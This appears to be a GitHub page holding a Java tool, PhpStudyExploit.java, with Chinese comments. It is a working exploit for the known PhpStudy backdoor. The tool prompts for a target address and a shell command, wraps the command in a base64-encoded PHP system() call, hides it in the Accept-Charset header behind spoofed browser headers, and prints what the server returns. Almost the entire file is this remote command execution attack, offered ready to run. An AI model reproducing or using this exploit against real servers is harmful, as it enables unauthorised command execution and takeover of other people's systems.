-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathPhpStudyExploit.java
59 lines (59 loc) · 3.23 KB
/
PhpStudyExploit.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
import com.sun.scenario.effect.impl.sw.sse.SSEBlend_SRC_OUTPeer;
import sun.misc.BASE64Encoder;
import java.util.Scanner;
import java.io.*;
import java.net.*;
public class PhpStudyExploit {
/*将命令转换成base64加密*/
public static String getBASE64() {
Scanner scanner = new Scanner(System.in);
System.out.print("请输入需要执行的CMD命令:");
scanner.useDelimiter("/n");
String payload = "system('"+scanner.nextLine()+"');";
BASE64Encoder encode = new BASE64Encoder();
String base64 = encode.encode(payload.getBytes());
System.out.println("你输入的命令为:"+payload);
System.out.println("您输入的命令的BASE64加密为:"+base64);
return base64;
}
/*进入主方法*/
public static void main(String[] args) throws Exception {
//个人工具开发版权信息
System.out.println("+-----------------------------------------------+");
System.out.println("+----------[PhpStudy Backdoor Exploit]----------+");
System.out.println("+----------[开发者:SKY·SECURITY 道 ]----------+");
System.out.println("+----------[SKY·SEC:WwW.Hi-AwSafe.CoM]---------+");
System.out.println("+-----------------------------------------------+");
//面向对象,让用户自主输入漏洞链接
Scanner scan = new Scanner(System.in);
System.out.print("请输入漏洞地址:");
String url = scan.next();
System.out.println("正在给URL:" + url+"利用中...");
/*调用执行命令base64方法*/
String base64 = getBASE64();
/*伪造header*/
HttpURLConnection conn = (HttpURLConnection) new URL("http://"+url).openConnection();
conn.setRequestProperty("Upgrade-Insecure-Requests", "1");
conn.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36");
conn.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3");
conn.setRequestProperty("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
conn.setRequestProperty("Accept-Encoding","gzip,deflate");
conn.setRequestProperty("Accept-Charset",base64);
conn.setRequestProperty("Connection","close");
/*获取返回信息*/
InputStream is = conn.getInputStream();
StringBuffer servername = new StringBuffer();
BufferedReader br = new BufferedReader(new InputStreamReader(is));
String strLine = "";
while ((strLine = br.readLine()) != null) {
servername.append(strLine.trim());
}
/*将结果输出*/
System.out.println("[ + ]********************************************************[ + ]");
System.out.print("命令返回的数据:");
String username=servername.toString();
String payloadecho=username.substring(0,username.indexOf("<"));
System.out.println(payloadecho);
System.out.println("[ - ]********************************************************[ - ]");
}
}